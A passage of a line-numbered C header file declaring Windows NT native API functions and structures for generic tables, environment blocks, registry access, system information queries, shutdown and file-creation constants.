PRTL_HANDLE_TABLE_ENTRY *Handle 830 | ); 831 | 832 | 833 | NTSYSAPI 834 | PVOID 835 | NTAPI 836 | RtlInsertElementGenericTable ( 837 | IN PRTL_GENERIC_TABLE Table, 838 | IN PVOID Buffer, 839 | IN LONG BufferSize, 840 | OUT PBOOLEAN NewElement OPTIONAL 841 | ); 842 | 843 | 844 | NTSYSAPI 845 | BOOLEAN 846 | NTAPI 847 | RtlIsGenericTableEmpty ( 848 | IN PRTL_GENERIC_TABLE Table 849 | ); 850 | 851 | 852 | NTSYSAPI 853 | BOOLEAN 854 | NTAPI 855 | RtlIsGenericTableEmpty ( 856 | IN PRTL_GENERIC_TABLE Table 857 | ); 858 | 859 | 860 | NTSYSAPI 861 | PVOID 862 | NTAPI 863 | RtlLookupElementGenericTable ( 864 | IN PRTL_GENERIC_TABLE Table, 865 | IN PVOID Buffer 866 | ); 867 | 868 | 869 | NTSYSAPI 870 | PVOID 871 | NTAPI 872 | RtlEnumerateGenericTableWithoutSplaying( 873 | IN PRTL_GENERIC_TABLE Table, 874 | IN PVOID *RestartKey 875 | ); 876 | 877 | 878 | NTSYSAPI 879 | NTSTATUS 880 | NTAPI 881 | NtClose( 882 | IN HANDLE Handle 883 | ); 884 | 885 | 886 | NTSYSAPI 887 | NTSTATUS 888 | NTAPI 889 | ZwClose( 890 | IN HANDLE Handle 891 | ); 892 | 893 | //----------------------------------------------------------------------------- 894 | // Environment functions 895 | 896 | NTSYSAPI 897 | NTSTATUS 898 | NTAPI 899 | RtlOpenCurrentUser( 900 | IN ULONG DesiredAccess, 901 | OUT PHANDLE CurrentUserKey 902 | ); 903 | 904 | 905 | NTSYSAPI 906 | NTSTATUS 907 | NTAPI 908 | RtlCreateEnvironment( 909 | BOOLEAN CloneCurrentEnvironment, 910 | PVOID *Environment 911 | ); 912 | 913 | 914 | NTSYSAPI 915 | NTSTATUS 916 | NTAPI 917 | RtlQueryEnvironmentVariable_U ( 918 | PVOID Environment, 919 | PUNICODE_STRING Name, 920 | PUNICODE_STRING Value 921 | ); 922 | 923 | 924 | NTSYSAPI 925 | NTSTATUS 926 | NTAPI 927 | RtlSetEnvironmentVariable( 928 | PVOID *Environment, 929 | PUNICODE_STRING Name, 930 | PUNICODE_STRING Value 931 | ); 932 | 933 | 934 | NTSYSAPI 935 | NTSTATUS 936 | NTAPI 937 | RtlDestroyEnvironment( 938 | PVOID Environment 939 | ); 940 | 941 | //----------------------------------------------------------------------------- 942 | // Registry functions 943 | 944 | 945 | typedef enum _KEY_INFORMATION_CLASS 946 | { 947 | KeyBasicInformation, 948 | KeyNodeInformation, 949 | KeyFullInformation, 950 | KeyNameInformation, 951 | KeyCachedInformation, 952 | KeyFlagsInformation, 953 | MaxKeyInfoClass // MaxKeyInfoClass should always be the last enum 954 | 955 | } KEY_INFORMATION_CLASS; 956 | 957 | // 958 | // Key query structures 959 | // 960 | 961 | typedef struct _KEY_BASIC_INFORMATION 962 | { 963 | LARGE_INTEGER LastWriteTime; 964 | ULONG TitleIndex; 965 | ULONG NameLength; 966 | WCHAR Name[1]; // Variable length string 967 | 968 | } KEY_BASIC_INFORMATION, *PKEY_BASIC_INFORMATION; 969 | 970 | 971 | typedef struct _KEY_NODE_INFORMATION 972 | { 973 | LARGE_INTEGER LastWriteTime; 974 | ULONG TitleIndex; 975 | ULONG ClassOffset; 976 | ULONG ClassLength; 977 | ULONG NameLength; 978 | WCHAR Name[1]; // Variable length string 979 | // Class[1]; // Variable length string not declared 980 | } KEY_NODE_INFORMATION, *PKEY_NODE_INFORMATION; 981 | 982 | 983 | typedef struct _KEY_FULL_INFORMATION 984 | { 985 | LARGE_INTEGER LastWriteTime; 986 | ULONG TitleIndex; 987 | ULONG ClassOffset; 988 | ULONG ClassLength; 989 | ULONG SubKeys; 990 | ULONG MaxNameLen; 991 | ULONG MaxClassLen; 992 | ULONG Values; 993 | ULONG MaxValueNameLen; 994 | ULONG MaxValueDataLen; 995 | WCHAR Class[1]; // Variable length 996 | 997 | } KEY_FULL_INFORMATION, *PKEY_FULL_INFORMATION; 998 | 999 | 1000 | // end_wdm 1001 | typedef struct _KEY_NAME_INFORMATION 1002 | { 1003 | ULONG NameLength; 1004 | WCHAR Name[1]; // Variable length string 1005 | 1006 | } KEY_NAME_INFORMATION, *PKEY_NAME_INFORMATION; 1007 | 1008 | typedef struct _KEY_CACHED_INFORMATION 1009 | { 1010 | LARGE_INTEGER LastWriteTime; 1011 | ULONG TitleIndex; 1012 | ULONG SubKeys; 1013 | ULONG MaxNameLen; 1014 | ULONG Values; 1015 | ULONG MaxValueNameLen; 1016 | ULONG MaxValueDataLen; 1017 | ULONG NameLength; 1018 | WCHAR Name[1]; // Variable length string 1019 | 1020 | } KEY_CACHED_INFORMATION, *PKEY_CACHED_INFORMATION; 1021 | 1022 | 1023 | typedef struct _KEY_FLAGS_INFORMATION 1024 | { 1025 | ULONG UserFlags; 1026 | 1027 | } KEY_FLAGS_INFORMATION, *PKEY_FLAGS_INFORMATION; 1028 | 1029 | 1030 | 1031 | typedef enum _KEY_VALUE_INFORMATION_CLASS { 1032 | KeyValueBasicInformation, 1033 | KeyValueFullInformation, 1034 | KeyValuePartialInformation, 1035 | KeyValueFullInformationAlign64, 1036 | KeyValuePartialInformationAlign64, 1037 | MaxKeyValueInfoClass // MaxKeyValueInfoClass should always be the last enum 1038 | } KEY_VALUE_INFORMATION_CLASS; 1039 | 1040 | 1041 | typedef struct _KEY_VALUE_FULL_INFORMATION { 1042 | ULONG TitleIndex; 1043 | ULONG Type; 1044 | ULONG DataOffset; 1045 | ULONG DataLength; 1046 | ULONG NameLength; 1047 | WCHAR Name[1]; // Variable size 1048 | // Data[1]; // Variable size data not declared 1049 | } KEY_VALUE_FULL_INFORMATION, *PKEY_VALUE_FULL_INFORMATION; 1050 | 1051 | 1052 | typedef struct _KEY_VALUE_PARTIAL_INFORMATION { 1053 | ULONG TitleIndex; 1054 | ULONG Type; 1055 | ULONG DataLength; 1056 | UCHAR Data[1]; // Variable size 1057 | } KEY_VALUE_PARTIAL_INFORMATION, *PKEY_VALUE_PARTIAL_INFORMATION; 1058 | 1059 | 1060 | 1061 | NTSYSAPI 1062 | NTSTATUS 1063 | NTAPI 1064 | NtCreateKey( 1065 | OUT PHANDLE KeyHandle, 1066 | IN ACCESS_MASK DesiredAccess, 1067 | IN POBJECT_ATTRIBUTES ObjectAttributes, 1068 | IN ULONG TitleIndex, 1069 | IN PUNICODE_STRING Class OPTIONAL, 1070 | IN ULONG CreateOptions, 1071 | OUT PULONG Disposition OPTIONAL 1072 | ); 1073 | 1074 | 1075 | NTSYSAPI 1076 | NTSTATUS 1077 | NTAPI 1078 | NtOpenKey( 1079 | OUT PHANDLE KeyHandle, 1080 | IN ACCESS_MASK DesiredAccess, 1081 | IN POBJECT_ATTRIBUTES ObjectAttributes 1082 | ); 1083 | 1084 | NTSYSAPI 1085 | NTSTATUS 1086 | NTAPI 1087 | NtQueryKey( 1088 | IN HANDLE KeyHandle, 1089 | IN KEY_INFORMATION_CLASS KeyInformationClass, 1090 | OUT PVOID KeyInformation, 1091 | IN ULONG Length, 1092 | OUT PULONG ResultLength 1093 | ); 1094 | 1095 | NTSYSAPI 1096 | NTSTATUS 1097 | NTAPI 1098 | NtEnumerateKey( 1099 | IN HANDLE KeyHandle, 1100 | IN ULONG Index, 1101 | IN KEY_INFORMATION_CLASS KeyInformationClass, 1102 | IN PVOID KeyInformation, 1103 | IN ULONG Length, 1104 | IN PULONG ResultLength 1105 | ); 1106 | 1107 | 1108 | NTSYSAPI 1109 | NTSTATUS 1110 | NTAPI 1111 | NtDeleteKey( 1112 | IN HANDLE KeyHandle 1113 | ); 1114 | 1115 | 1116 | NTSYSAPI 1117 | NTSTATUS 1118 | NTAPI 1119 | NtQueryValueKey( 1120 | IN HANDLE KeyHandle, 1121 | IN PUNICODE_STRING ValueName, 1122 | IN KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass, 1123 | OUT PVOID KeyValueInformation, 1124 | IN ULONG Length, 1125 | OUT PULONG ResultLength 1126 | ); 1127 | 1128 | 1129 | NTSYSAPI 1130 | NTSTATUS 1131 | NTAPI 1132 | NtSetValueKey( 1133 | IN HANDLE KeyHandle, 1134 | IN PUNICODE_STRING ValueName, 1135 | IN ULONG TitleIndex OPTIONAL, 1136 | IN ULONG Type, 1137 | IN PVOID Data, 1138 | IN ULONG DataSize 1139 | ); 1140 | 1141 | 1142 | NTSYSAPI 1143 | NTSTATUS 1144 | NTAPI 1145 | NtDeleteValueKey( 1146 | IN HANDLE KeyHandle, 1147 | IN PUNICODE_STRING ValueName 1148 | ); 1149 | 1150 | //----------------------------------------------------------------------------- 1151 | // RtlQueryRegistryValues 1152 | 1153 | // 1154 | // The following flags specify how the Name field of a RTL_QUERY_REGISTRY_TABLE 1155 | // entry is interpreted. A NULL name indicates the end of the table. 1156 | // 1157 | 1158 | #define RTL_QUERY_REGISTRY_SUBKEY 0x00000001 // Name is a subkey and remainder of 1159 | // table or until next subkey are value 1160 | // names for that subkey to look at. 1161 | 1162 | #define RTL_QUERY_REGISTRY_TOPKEY 0x00000002 // Reset current key to original key for 1163 | // this and all following table entries. 1164 | 1165 | #define RTL_QUERY_REGISTRY_REQUIRED 0x00000004 // Fail if no match found for this table 1166 | // entry. 1167 | 1168 | #define RTL_QUERY_REGISTRY_NOVALUE 0x00000008 // Used to mark a table entry that has no 1169 | // value name, just wants a call out, not 1170 | // an enumeration of all values. 1171 | 1172 | #define RTL_QUERY_REGISTRY_NOEXPAND 0x00000010 // Used to suppress the expansion of 1173 | // REG_MULTI_SZ into multiple callouts or 1174 | // to prevent the expansion of environment 1175 | // variable values in REG_EXPAND_SZ 1176 | 1177 | #define RTL_QUERY_REGISTRY_DIRECT 0x00000020 // QueryRoutine field ignored. EntryContext 1178 | // field points to location to store value. 1179 | // For null terminated strings, EntryContext 1180 | // points to UNICODE_STRING structure that 1181 | // that describes maximum size of buffer. 1182 | // If .Buffer field is NULL then a buffer is 1183 | // allocated. 1184 | // 1185 | 1186 | #define RTL_QUERY_REGISTRY_DELETE 0x00000040 // Used to delete value keys after they 1187 | // are queried. 1188 | 1189 | 1190 | // 1191 | // The following values for the RelativeTo parameter determine what the 1192 | // Path parameter to RtlQueryRegistryValues is relative to. 1193 | // 1194 | 1195 | #define RTL_REGISTRY_ABSOLUTE 0 // Path is a full path 1196 | #define RTL_REGISTRY_SERVICES 1 // \Registry\Machine\System\CurrentControlSet\Services 1197 | #define RTL_REGISTRY_CONTROL 2 // \Registry\Machine\System\CurrentControlSet\Control 1198 | #define RTL_REGISTRY_WINDOWS_NT 3 // \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion 1199 | #define RTL_REGISTRY_DEVICEMAP 4 // \Registry\Machine\Hardware\DeviceMap 1200 | #define RTL_REGISTRY_USER 5 // \Registry\User\CurrentUser 1201 | #define RTL_REGISTRY_MAXIMUM 6 1202 | #define RTL_REGISTRY_HANDLE 0x40000000 // Low order bits are registry handle 1203 | #define RTL_REGISTRY_OPTIONAL 0x80000000 // Indicates the key node is optional 1204 | 1205 | 1206 | typedef NTSTATUS (NTAPI * PRTL_QUERY_REGISTRY_ROUTINE)( 1207 | IN PWSTR ValueName, 1208 | IN ULONG ValueType, 1209 | IN PVOID ValueData, 1210 | IN ULONG ValueLength, 1211 | IN PVOID Context, 1212 | IN PVOID EntryContext 1213 | ); 1214 | 1215 | typedef struct _RTL_QUERY_REGISTRY_TABLE 1216 | { 1217 | PRTL_QUERY_REGISTRY_ROUTINE QueryRoutine; 1218 | ULONG Flags; 1219 | PWSTR Name; 1220 | PVOID EntryContext; 1221 | ULONG DefaultType; 1222 | PVOID DefaultData; 1223 | ULONG DefaultLength; 1224 | 1225 | } RTL_QUERY_REGISTRY_TABLE, *PRTL_QUERY_REGISTRY_TABLE; 1226 | 1227 | 1228 | NTSYSAPI 1229 | NTSTATUS 1230 | NTAPI 1231 | RtlQueryRegistryValues( 1232 | IN ULONG RelativeTo, 1233 | IN PCWSTR Path, 1234 | IN PRTL_QUERY_REGISTRY_TABLE QueryTable, 1235 | IN PVOID Context, 1236 | IN PVOID Environment OPTIONAL 1237 | ); 1238 | 1239 | 1240 | //----------------------------------------------------------------------------- 1241 | // Query system information 1242 | 1243 | typedef enum _SYSTEM_INFORMATION_CLASS 1244 | { 1245 | SystemBasicInformation, // 0x00 SYSTEM_BASIC_INFORMATION 1246 | SystemProcessorInformation, // 0x01 SYSTEM_PROCESSOR_INFORMATION 1247 | SystemPerformanceInformation, // 0x02 1248 | SystemTimeOfDayInformation, // 0x03 1249 | SystemPathInformation, // 0x04 1250 | SystemProcessInformation, // 0x05 1251 | SystemCallCountInformation, // 0x06 1252 | SystemDeviceInformation, // 0x07 1253 | SystemProcessorPerformanceInformation, // 0x08 1254 | SystemFlagsInformation, // 0x09 1255 | SystemCallTimeInformation, // 0x0A 1256 | SystemModuleInformation, // 0x0B SYSTEM_MODULE_INFORMATION 1257 | SystemLocksInformation, // 0x0C 1258 | SystemStackTraceInformation, // 0x0D 1259 | SystemPagedPoolInformation, // 0x0E 1260 | SystemNonPagedPoolInformation, // 0x0F 1261 | SystemHandleInformation, // 0x10 1262 | SystemObjectInformation, // 0x11 1263 | SystemPageFileInformation, // 0x12 1264 | SystemVdmInstemulInformation, // 0x13 1265 | SystemVdmBopInformation, // 0x14 1266 | SystemFileCacheInformation, // 0x15 1267 | SystemPoolTagInformation, // 0x16 1268 | SystemInterruptInformation, // 0x17 1269 | SystemDpcBehaviorInformation, // 0x18 1270 | SystemFullMemoryInformation, // 0x19 1271 | SystemLoadGdiDriverInformation, // 0x1A 1272 | SystemUnloadGdiDriverInformation, // 0x1B 1273 | SystemTimeAdjustmentInformation, // 0x1C 1274 | SystemSummaryMemoryInformation, // 0x1D 1275 | SystemNextEventIdInformation, // 0x1E 1276 | SystemEventIdsInformation, // 0x1F 1277 | SystemCrashDumpInformation, // 0x20 1278 | SystemExceptionInformation, // 0x21 1279 | SystemCrashDumpStateInformation, // 0x22 1280 | SystemKernelDebuggerInformation, // 0x23 1281 | SystemContextSwitchInformation, // 0x24 1282 | SystemRegistryQuotaInformation, // 0x25 1283 | SystemExtendServiceTableInformation, // 0x26 1284 | SystemPrioritySeperation, // 0x27 1285 | SystemPlugPlayBusInformation, // 0x28 1286 | SystemDockInformation, // 0x29 1287 | //SystemPowerInformation, // 0x2A 1288 | //SystemProcessorSpeedInformation, // 0x2B 1289 | //SystemCurrentTimeZoneInformation, // 0x2C 1290 | //SystemLookasideInformation // 0x2D 1291 | 1292 | } SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS; 1293 | 1294 | // 1295 | // Thread priority 1296 | // 1297 | 1298 | typedef LONG KPRIORITY; 1299 | 1300 | // 1301 | // Basic System information 1302 | // NtQuerySystemInformation with SystemBasicInformation 1303 | // 1304 | 1305 | typedef struct _SYSTEM_BASIC_INFORMATION { 1306 | ULONG Reserved; 1307 | ULONG TimerResolution; 1308 | ULONG PageSize; 1309 | ULONG NumberOfPhysicalPages; 1310 | ULONG LowestPhysicalPageNumber; 1311 | ULONG HighestPhysicalPageNumber; 1312 | ULONG AllocationGranularity; 1313 | ULONG MinimumUserModeAddress; 1314 | ULONG MaximumUserModeAddress; 1315 | KAFFINITY ActiveProcessorsAffinityMask; 1316 | CCHAR NumberOfProcessors; 1317 | } SYSTEM_BASIC_INFORMATION, *PSYSTEM_BASIC_INFORMATION; 1318 | 1319 | // 1320 | // Processor information 1321 | // NtQuerySystemInformation with SystemProcessorInformation 1322 | // 1323 | 1324 | typedef struct _SYSTEM_PROCESSOR_INFORMATION { 1325 | USHORT ProcessorArchitecture; 1326 | USHORT ProcessorLevel; 1327 | USHORT ProcessorRevision; 1328 | USHORT Reserved; 1329 | ULONG ProcessorFeatureBits; 1330 | } SYSTEM_PROCESSOR_INFORMATION, *PSYSTEM_PROCESSOR_INFORMATION; 1331 | 1332 | // 1333 | // Performance information 1334 | // NtQuerySystemInformation with SystemPerformanceInformation 1335 | // 1336 | 1337 | typedef struct _SYSTEM_PERFORMANCE_INFORMATION { 1338 | LARGE_INTEGER IdleProcessTime; 1339 | LARGE_INTEGER IoReadTransferCount; 1340 | LARGE_INTEGER IoWriteTransferCount; 1341 | LARGE_INTEGER IoOtherTransferCount; 1342 | ULONG IoReadOperationCount; 1343 | ULONG IoWriteOperationCount; 1344 | ULONG IoOtherOperationCount; 1345 | ULONG AvailablePages; 1346 | ULONG CommittedPages; 1347 | ULONG CommitLimit; 1348 | ULONG PeakCommitment; 1349 | ULONG PageFaultCount; 1350 | ULONG CopyOnWriteCount; 1351 | ULONG TransitionCount; 1352 | ULONG CacheTransitionCount; 1353 | ULONG DemandZeroCount; 1354 | ULONG PageReadCount; 1355 | ULONG PageReadIoCount; 1356 | ULONG CacheReadCount; 1357 | ULONG CacheIoCount; 1358 | ULONG DirtyPagesWriteCount; 1359 | ULONG DirtyWriteIoCount; 1360 | ULONG MappedPagesWriteCount; 1361 | ULONG MappedWriteIoCount; 1362 | ULONG PagedPoolPages; 1363 | ULONG NonPagedPoolPages; 1364 | ULONG PagedPoolAllocs; 1365 | ULONG PagedPoolFrees; 1366 | ULONG NonPagedPoolAllocs; 1367 | ULONG NonPagedPoolFrees; 1368 | ULONG FreeSystemPtes; 1369 | ULONG ResidentSystemCodePage; 1370 | ULONG TotalSystemDriverPages; 1371 | ULONG TotalSystemCodePages; 1372 | ULONG NonPagedPoolLookasideHits; 1373 | ULONG PagedPoolLookasideHits; 1374 | ULONG Spare3Count; 1375 | ULONG ResidentSystemCachePage; 1376 | ULONG ResidentPagedPoolPage; 1377 | ULONG ResidentSystemDriverPage; 1378 | ULONG CcFastReadNoWait; 1379 | ULONG CcFastReadWait; 1380 | ULONG CcFastReadResourceMiss; 1381 | ULONG CcFastReadNotPossible; 1382 | ULONG CcFastMdlReadNoWait; 1383 | ULONG CcFastMdlReadWait; 1384 | ULONG CcFastMdlReadResourceMiss; 1385 | ULONG CcFastMdlReadNotPossible; 1386 | ULONG CcMapDataNoWait; 1387 | ULONG CcMapDataWait; 1388 | ULONG CcMapDataNoWaitMiss; 1389 | ULONG CcMapDataWaitMiss; 1390 | ULONG CcPinMappedDataCount; 1391 | ULONG CcPinReadNoWait; 1392 | ULONG CcPinReadWait; 1393 | ULONG CcPinReadNoWaitMiss; 1394 | ULONG CcPinReadWaitMiss; 1395 | ULONG CcCopyReadNoWait; 1396 | ULONG CcCopyReadWait; 1397 | ULONG CcCopyReadNoWaitMiss; 1398 | ULONG CcCopyReadWaitMiss; 1399 | ULONG CcMdlReadNoWait; 1400 | ULONG CcMdlReadWait; 1401 | ULONG CcMdlReadNoWaitMiss; 1402 | ULONG CcMdlReadWaitMiss; 1403 | ULONG CcReadAheadIos; 1404 | ULONG CcLazyWriteIos; 1405 | ULONG CcLazyWritePages; 1406 | ULONG CcDataFlushes; 1407 | ULONG CcDataPages; 1408 | ULONG ContextSwitches; 1409 | ULONG FirstLevelTbFills; 1410 | ULONG SecondLevelTbFills; 1411 | ULONG SystemCalls; 1412 | } SYSTEM_PERFORMANCE_INFORMATION, *PSYSTEM_PERFORMANCE_INFORMATION; 1413 | 1414 | // 1415 | // Time of Day information 1416 | // NtQuerySystemInformation with SystemTimeOfDayInformation 1417 | // 1418 | 1419 | typedef struct _SYSTEM_TIMEOFDAY_INFORMATION { 1420 | LARGE_INTEGER BootTime; 1421 | LARGE_INTEGER CurrentTime; 1422 | LARGE_INTEGER TimeZoneBias; 1423 | ULONG TimeZoneId; 1424 | ULONG Reserved; 1425 | } SYSTEM_TIMEOFDAY_INFORMATION, *PSYSTEM_TIMEOFDAY_INFORMATION; 1426 | 1427 | // 1428 | // Process information 1429 | // NtQuerySystemInformation with SystemProcessInformation 1430 | // 1431 | 1432 | typedef struct _SYSTEM_PROCESS_INFORMATION { 1433 | ULONG NextEntryOffset; 1434 | ULONG NumberOfThreads; 1435 | LARGE_INTEGER SpareLi1; 1436 | LARGE_INTEGER SpareLi2; 1437 | LARGE_INTEGER SpareLi3; 1438 | LARGE_INTEGER CreateTime; 1439 | LARGE_INTEGER UserTime; 1440 | LARGE_INTEGER KernelTime; 1441 | UNICODE_STRING ImageName; 1442 | KPRIORITY BasePriority; 1443 | ULONG_PTR UniqueProcessId; 1444 | ULONG_PTR InheritedFromUniqueProcessId; 1445 | ULONG HandleCount; 1446 | // Next part is platform dependent 1447 | 1448 | } SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION; 1449 | 1450 | // 1451 | // Device information 1452 | // NtQuerySystemInformation with SystemDeviceInformation 1453 | // 1454 | 1455 | typedef struct _SYSTEM_DEVICE_INFORMATION { 1456 | ULONG NumberOfDisks; 1457 | ULONG NumberOfFloppies; 1458 | ULONG NumberOfCdRoms; 1459 | ULONG NumberOfTapes; 1460 | ULONG NumberOfSerialPorts; 1461 | ULONG NumberOfParallelPorts; 1462 | } SYSTEM_DEVICE_INFORMATION, *PSYSTEM_DEVICE_INFORMATION; 1463 | 1464 | // 1465 | // Processor performance information 1466 | // NtQuerySystemInformation with SystemProcessorPerformanceInformation 1467 | // 1468 | 1469 | typedef struct _SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION { 1470 | LARGE_INTEGER IdleTime; 1471 | LARGE_INTEGER KernelTime; 1472 | LARGE_INTEGER UserTime; 1473 | LARGE_INTEGER DpcTime; // DEVL only 1474 | LARGE_INTEGER InterruptTime; // DEVL only 1475 | ULONG InterruptCount; 1476 | } SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION, *PSYSTEM_PROCESSOR_PERFORMANCE_INFORMATION; 1477 | 1478 | // 1479 | // NT Global Flag information 1480 | // NtQuerySystemInformation with SystemFlagsInformation 1481 | // 1482 | 1483 | typedef struct _SYSTEM_FLAGS_INFORMATION 1484 | { 1485 | ULONG GlobalFlag; 1486 | 1487 | } SYSTEM_FLAGS_INFORMATION, *PSYSTEM_FLAGS_INFORMATION; 1488 | 1489 | // 1490 | // System Module information 1491 | // NtQuerySystemInformation with SystemModuleInformation 1492 | // 1493 | 1494 | typedef struct _SYSTEM_MODULE 1495 | { 1496 | ULONG Reserved1; // Should be 0xBAADF00D 1497 | ULONG Reserved2; // Should be zero 1498 | PVOID Base; 1499 | ULONG Size; 1500 | ULONG Flags; 1501 | USHORT Index; 1502 | USHORT Unknown; 1503 | USHORT LoadCount; 1504 | USHORT ModuleNameOffset; 1505 | CHAR ImageName[256]; 1506 | 1507 | } SYSTEM_MODULE, *PSYSTEM_MODULE; 1508 | 1509 | 1510 | typedef struct _SYSTEM_MODULE_INFORMATION 1511 | { 1512 | ULONG ModulesCount; 1513 | SYSTEM_MODULE Modules[1]; 1514 | 1515 | } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; 1516 | 1517 | /* 1518 | typedef struct _SYSTEM_VDM_INSTEMUL_INFO { 1519 | ULONG SegmentNotPresent ; 1520 | ULONG VdmOpcode0F ; 1521 | ULONG OpcodeESPrefix ; 1522 | ULONG OpcodeCSPrefix ; 1523 | ULONG OpcodeSSPrefix ; 1524 | ULONG OpcodeDSPrefix ; 1525 | ULONG OpcodeFSPrefix ; 1526 | ULONG OpcodeGSPrefix ; 1527 | ULONG OpcodeOPER32Prefix; 1528 | ULONG OpcodeADDR32Prefix; 1529 | ULONG OpcodeINSB ; 1530 | ULONG OpcodeINSW ; 1531 | ULONG OpcodeOUTSB ; 1532 | ULONG OpcodeOUTSW ; 1533 | ULONG OpcodePUSHF ; 1534 | ULONG OpcodePOPF ; 1535 | ULONG OpcodeINTnn ; 1536 | ULONG OpcodeINTO ; 1537 | ULONG OpcodeIRET ; 1538 | ULONG OpcodeINBimm ; 1539 | ULONG OpcodeINWimm ; 1540 | ULONG OpcodeOUTBimm ; 1541 | ULONG OpcodeOUTWimm ; 1542 | ULONG OpcodeINB ; 1543 | ULONG OpcodeINW ; 1544 | ULONG OpcodeOUTB ; 1545 | ULONG OpcodeOUTW ; 1546 | ULONG OpcodeLOCKPrefix ; 1547 | ULONG OpcodeREPNEPrefix ; 1548 | ULONG OpcodeREPPrefix ; 1549 | ULONG OpcodeHLT ; 1550 | ULONG OpcodeCLI ; 1551 | ULONG OpcodeSTI ; 1552 | ULONG BopCount ; 1553 | } SYSTEM_VDM_INSTEMUL_INFO, *PSYSTEM_VDM_INSTEMUL_INFO; 1554 | 1555 | 1556 | typedef struct _SYSTEM_QUERY_TIME_ADJUST_INFORMATION { 1557 | ULONG TimeAdjustment; 1558 | ULONG TimeIncrement; 1559 | BOOLEAN Enable; 1560 | } SYSTEM_QUERY_TIME_ADJUST_INFORMATION, *PSYSTEM_QUERY_TIME_ADJUST_INFORMATION; 1561 | 1562 | typedef struct _SYSTEM_SET_TIME_ADJUST_INFORMATION { 1563 | ULONG TimeAdjustment; 1564 | BOOLEAN Enable; 1565 | } SYSTEM_SET_TIME_ADJUST_INFORMATION, *PSYSTEM_SET_TIME_ADJUST_INFORMATION; 1566 | 1567 | 1568 | typedef struct _SYSTEM_THREAD_INFORMATION { 1569 | LARGE_INTEGER KernelTime; 1570 | LARGE_INTEGER UserTime; 1571 | LARGE_INTEGER CreateTime; 1572 | ULONG WaitTime; 1573 | PVOID StartAddress; 1574 | CLIENT_ID ClientId; 1575 | KPRIORITY Priority; 1576 | LONG BasePriority; 1577 | ULONG ContextSwitches; 1578 | ULONG ThreadState; 1579 | ULONG WaitReason; 1580 | } SYSTEM_THREAD_INFORMATION, *PSYSTEM_THREAD_INFORMATION; 1581 | 1582 | typedef struct _SYSTEM_MEMORY_INFO { 1583 | PUCHAR StringOffset; 1584 | USHORT ValidCount; 1585 | USHORT TransitionCount; 1586 | USHORT ModifiedCount; 1587 | USHORT PageTableCount; 1588 | } SYSTEM_MEMORY_INFO, *PSYSTEM_MEMORY_INFO; 1589 | 1590 | typedef struct _SYSTEM_MEMORY_INFORMATION { 1591 | ULONG InfoSize; 1592 | ULONG StringStart; 1593 | SYSTEM_MEMORY_INFO Memory[1]; 1594 | } SYSTEM_MEMORY_INFORMATION, *PSYSTEM_MEMORY_INFORMATION; 1595 | 1596 | typedef struct _SYSTEM_CALL_COUNT_INFORMATION { 1597 | ULONG Length; 1598 | ULONG NumberOfTables; 1599 | //ULONG NumberOfEntries[NumberOfTables]; 1600 | //ULONG CallCounts[NumberOfTables][NumberOfEntries]; 1601 | } SYSTEM_CALL_COUNT_INFORMATION, *PSYSTEM_CALL_COUNT_INFORMATION; 1602 | 1603 | typedef struct _SYSTEM_CRASH_DUMP_INFORMATION { 1604 | HANDLE CrashDumpSection; 1605 | } SYSTEM_CRASH_DUMP_INFORMATION, *PSYSTEM_CRASH_DUMP_INFORMATION; 1606 | 1607 | typedef struct _SYSTEM_EXCEPTION_INFORMATION { 1608 | ULONG AlignmentFixupCount; 1609 | ULONG ExceptionDispatchCount; 1610 | ULONG FloatingEmulationCount; 1611 | ULONG ByteWordEmulationCount; 1612 | } SYSTEM_EXCEPTION_INFORMATION, *PSYSTEM_EXCEPTION_INFORMATION; 1613 | 1614 | typedef struct _SYSTEM_CRASH_STATE_INFORMATION { 1615 | ULONG ValidCrashDump; 1616 | } SYSTEM_CRASH_STATE_INFORMATION, *PSYSTEM_CRASH_STATE_INFORMATION; 1617 | 1618 | typedef struct _SYSTEM_KERNEL_DEBUGGER_INFORMATION { 1619 | BOOLEAN KernelDebuggerEnabled; 1620 | BOOLEAN KernelDebuggerNotPresent; 1621 | } SYSTEM_KERNEL_DEBUGGER_INFORMATION, *PSYSTEM_KERNEL_DEBUGGER_INFORMATION; 1622 | 1623 | typedef struct _SYSTEM_REGISTRY_QUOTA_INFORMATION { 1624 | ULONG RegistryQuotaAllowed; 1625 | ULONG RegistryQuotaUsed; 1626 | ULONG PagedPoolSize; 1627 | } SYSTEM_REGISTRY_QUOTA_INFORMATION, *PSYSTEM_REGISTRY_QUOTA_INFORMATION; 1628 | 1629 | typedef struct _SYSTEM_GDI_DRIVER_INFORMATION { 1630 | UNICODE_STRING DriverName; 1631 | PVOID ImageAddress; 1632 | PVOID SectionPointer; 1633 | PVOID EntryPoint; 1634 | PIMAGE_EXPORT_DIRECTORY ExportSectionPointer; 1635 | } SYSTEM_GDI_DRIVER_INFORMATION, *PSYSTEM_GDI_DRIVER_INFORMATION; 1636 | */ 1637 | 1638 | NTSYSAPI 1639 | NTSTATUS 1640 | NTAPI 1641 | NtQuerySystemInformation( 1642 | IN SYSTEM_INFORMATION_CLASS SystemInformationClass, 1643 | OUT PVOID SystemInformation, 1644 | IN ULONG SystemInformationLength, 1645 | OUT PULONG ReturnLength 1646 | ); 1647 | 1648 | //------------------------------------------------------------------------------ 1649 | // Shutdown system 1650 | 1651 | typedef enum _SHUTDOWN_ACTION 1652 | { 1653 | ShutdownNoReboot, 1654 | ShutdownReboot, 1655 | ShutdownPowerOff 1656 | 1657 | } SHUTDOWN_ACTION, *PSHUTDOWN_ACTION; 1658 | 1659 | 1660 | NTSYSAPI 1661 | NTSTATUS 1662 | NTAPI 1663 | NtShutdownSystem( 1664 | IN SHUTDOWN_ACTION Action 1665 | ); 1666 | 1667 | //----------------------------------------------------------------------------- 1668 | // File functions 1669 | 1670 | #ifndef OLD_DOS_VOLID 1671 | #define OLD_DOS_VOLID 0x00000008 1672 | #endif 1673 | 1674 | #ifndef FILE_SUPERSEDE 1675 | #define FILE_SUPERSEDE 0x00000000 1676 | #define FILE_OPEN 0x00000001 1677 | #define FILE_CREATE 0x00000002 1678 | #define FILE_OPEN_IF 0x00000003 1679 | #define FILE_OVERWRITE 0x00000004 1680 | #define FILE_OVERWRITE_IF 0x00000005 